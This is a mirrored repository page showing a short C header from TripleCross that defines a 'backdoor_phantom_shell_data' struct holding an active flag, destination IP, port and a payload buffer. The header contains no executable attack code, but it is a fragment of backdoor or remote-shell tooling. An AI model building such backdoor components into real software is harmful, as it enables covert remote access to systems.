mirror of
https://github.com/h3xduck/TripleCross.git
synced 2025-12-26 19:33:07 +08:00
13 lines
177 B
C
13 lines
177 B
C
|
|
#ifndef __H_STRUCT_COMMON
|
||
|
|
#define __H_STRUCT_COMMON
|
||
|
|
|
||
|
|
|
||
|
|
struct backdoor_phantom_shell_data{
|
||
|
|
int active;
|
||
|
|
unsigned int d_ip;
|
||
|
|
unsigned short d_port;
|
||
|
|
char payload[64];
|
||
|
|
};
|
||
|
|
|
||
|
|
|
||
|
|
#endif
|